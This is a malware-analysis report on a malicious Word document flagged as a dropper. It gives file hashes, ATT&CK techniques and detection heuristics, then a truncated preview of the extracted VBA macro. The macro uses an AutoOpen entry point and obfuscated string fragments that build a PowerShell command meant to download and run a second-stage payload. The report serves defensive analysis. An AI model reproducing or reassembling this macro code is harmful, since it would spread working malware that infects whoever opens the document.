Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 579b0c664e976b37…

MALICIOUS

Office (OLE)

Size: 125.0 KB
Created: 2018-02-15 20:37:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: eaf5fafaee356a00aa097f538c62920a
SHA-1: f80f442aa91021504ea4f8d8669db3127818a7eb
SHA-256: 579b0c664e976b378be77d3edc27a78a35b55404adee16fcb9b664ad681eac2c
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro calls the Shell() function, which fires a critical heuristic, to execute commands; this suggests that the macro's purpose is to download and execute a second-stage payload. The presence of an AutoOpen entry point and legacy WordBasic auto-execution markers further indicates malicious intent.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6451759-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6451759-0
  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 25872 bytes
SHA-256: 672dc604e249edf904695d56de1862af99985bd82e0b5f282c5e4c2c8f2245ae

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "fdFEUjnm"
Function QdBJjwjTLRDtE()
On Error Resume Next
AjazTSvRw = 3389560 / CLng(pwGZuA) - 6788219 * Cos(9994853) + tPPAljowri + 3530404
UswtICCww = 3512096 / CLng(KXDQfjwM) - 5367266 * Cos(5287361) + drHtWLdQfvbh + 3239743
iFCnHXPWc = 9925619 / CLng(zQYwAzqWoiWdUz) - 664788 * Cos(3418662) + ndWtbvZj + 209459
njYCwpX = (ZVwjzhjFUoi) + HJjkJKD("T+']110+[char]116),[char]39  '+'-ReplACE  ([cha'+'r]56+[char]50+[char]103zcX+zcX),[chzcX+zcXar]'+'96-ReplACE  scoM3ysco,[char]36) 6SA.( ([sTriNg]c9sver'+'boSepREfE'+'rENCzcJVGTbqwwpRzkjNljFqPfHmtZtYIjzIIb", 2, 171)
CUwGqGim = 3779937 / CLng(AhIQbdK) - 8762120 * Cos(7607187) + BWVwQzzDzF + 8546375
RrWzFdm = 6899101 / CLng(kNXdmMq) - 6874315 * Cos(4672771) + kZwslL + 9074784
csZUuNpcn = 4639471 / CLng(wniQJqOcpjXNSQ) - 4000416 * Cos(4672310) + DAYhz + 8707164
tMuPUFXjV = (kmfofbmmV) + HJjkJKD("dqlhmFtnt+Antrg/xIAzcX+zcXnt+AnteDFfP/FK'+'T'+'Ant'+'+Ant.SplAnt+Antit(Ant'+'+AntFAnt+AntKT'+'?FKTAnt+Ant)Ant+Ant;CGJSD'+'zcX+zcXCAsco+scont+An'+'t = CAnt+ATNdzmjZBQ", 8, 149)
NXOul = 1739969 / CLng(UiHvzPBuEB) - 4687467 * Cos(3306453) + VcqVjWfvVFpNAw + 9184504
wFZTsqicHTP = 8571043 / CLng(USPpmikHhf) - 6772673 * Cos(5998350) + wpVbOYKiNwdiwc + 3496595
bRDMVFLtVw = 6506665 / CLng(SGBbjFBHiwGOwq) - 9250578 * Cos(3093342) + JzrZiXiwH + 4356776
usGiLuM = (ZCzOmXkBAAtS) + HJjkJKD("TvCTqlsYtqHbvPbBs .( $eNv:COmsPEC[4,24,25]-jOIn'') (('& ( V'+'iISH'+'ELLiD[1]+ViIsHEllId[13]+zcXx'+'zcX) ( ((zcX ((sco& ( M3yEnv:CoMs'+'peC[4,24,25]-JOinAntAzcX+zcXnt)((AntzcuJiw", 18, 157)
DNdVDY = 3678266 / CLng(qZkiTcZi) - 2877274 * Cos(7649) + wnoPdSmBuPXFC + 9580746
WjQZbijL = 5882204 / CLng(sREpOizjJcu) - 1964970 * Cos(8846378) + BFTlcQbzbOfYY + 601791
noLDaXvAJ = 3707414 / CLng(ikouhRKK) - 6021875 * Cos(2754887) + FGBYcHEORlQV + 2730666
ijqtn = (TfZDQPFhRZ) + HJjkJKD("sdnzrU-obAn'+'t+AntszcX+zcXc'+'o+scojecFKT+FAnt+AntKTtAnt+AntFKT) zcX+zcXrAnt+AntandAnt+AFiQIjQRvbYiOMLCpUKDdKdF", 7, 83)
UiJsFLkzUBw = 8676683 / CLng(qCQUoBhRP) - 5081186 * Cos(7723527) + bUAoEqpQHOGI + 9218530
iVVczwatXu = 5888769 / CLng(cKGlkzQzH) - 4903922 * Cos(7924645) + OIcuvL + 3879529
iWHpdstcUs = 1483375 / CLng(IRJljcSbvI) - 4718150 * Cos(1986707) + EHIoEoLUtPP + 6734589
XPuZWKhMC = (PqtJVzIjvJGOcW) + HJjkJKD("dfEZITCqkHREGiHZDrQzhfcUp'+'X+zcXe)[1,3]+scoxsco-jOiNuKVtKoYNjknB", 26, 28)
fTqWcrN = 1391543 / CLng(vGOCuCFVmHk) - 2344008 * Cos(9379141) + jjOMpARNwiww + 7213210
AuoXPZwitj = 8601617 / CLng(KjFpw) - 5193668 * Cos(7957515) + qCwwBL + 3251824
rfvfnfbvB = 5137069 / CLng(TKwUG) - 4831093 * Cos(3242929) + NiJfDv + 3334866
HHbZbwQ = (zDWzYLQQziDUlG) + HJjkJKD("Qr+'}catcAnt+Anth{}}AnqiriEXWTN", 3, 20)
jzBvFEV = 827817 / CLng(oiitfb) - 7557182 * Cos(1368520) + lkitvhTzEqh + 3034218
sjjQUu = 4664369 / CLng(zfdXI) - 3207699 * Cos(8061728) + hYNqnSTO + 302782
nmQWIVwR = 7095566 / CLng(NRfTm) - 2375111 * Cos(2432342) + dpsWuQf + 6976469
CYOja = (dYJsCPCfIuibuj) + HJjkJKD("NzIX+zdVhYaImEwBTXij", 4, 3)
PUQziqABCG = 2605857 / CLng(mSLrKwF) - 2341031 * Cos(5511033) + BSZIiFMzGLXw + 5471983
uTGKzLbaXP = 1745397 / CLng(GSKzAD) - 4869109 * Cos(6338539) + sRCLti + 7180318
uLrja = 5636996 / CLng(OJMflSYdsqBno) - 8068493 * Cos(441568) + DduMckclUQQ + 639986
jdncjzb = (fFtAippz) + HJjkJKD("kflwnEBVmLzaCwUUacX+zcXar]65+KJiLiTbadhbrwD", 18, 12)
WTOEaMAcak = 6000228 / CLng(EbAapEqQ) - 2703521 * Cos(5753949) + aKVCVboSbsj + 5421469
JVVdUmHF = 459687 / CLng(cwClEZtGCLoDa) - 2566531 * Cos(3835204) + dtjTSQMpFvW + 3225571
HncjKKI = 749146 / CLng(XzzkNIoiJ) - 867909 * Cos(7561031) + IJORBbwr + 2915127
wrhwWUs = (ztbhraXLi) + HJjkJKD("GvNirsiQRfTzriUuWzantzcX+zcX+Antfc'+'sco+sco.Ant+Ant2Ant+AntzcX+zcXTiAnt+AntTAnt+z'+'cX+zcXAntoSAnt+Anttre7Ant+A'+'ntjie7jzcX+zcXNgAnt'+'+Ant2Ti(zcX+zcX)Ant+Ant,sc'+'RjnQFJ", 20, 147)
zZEAW =
... (truncated)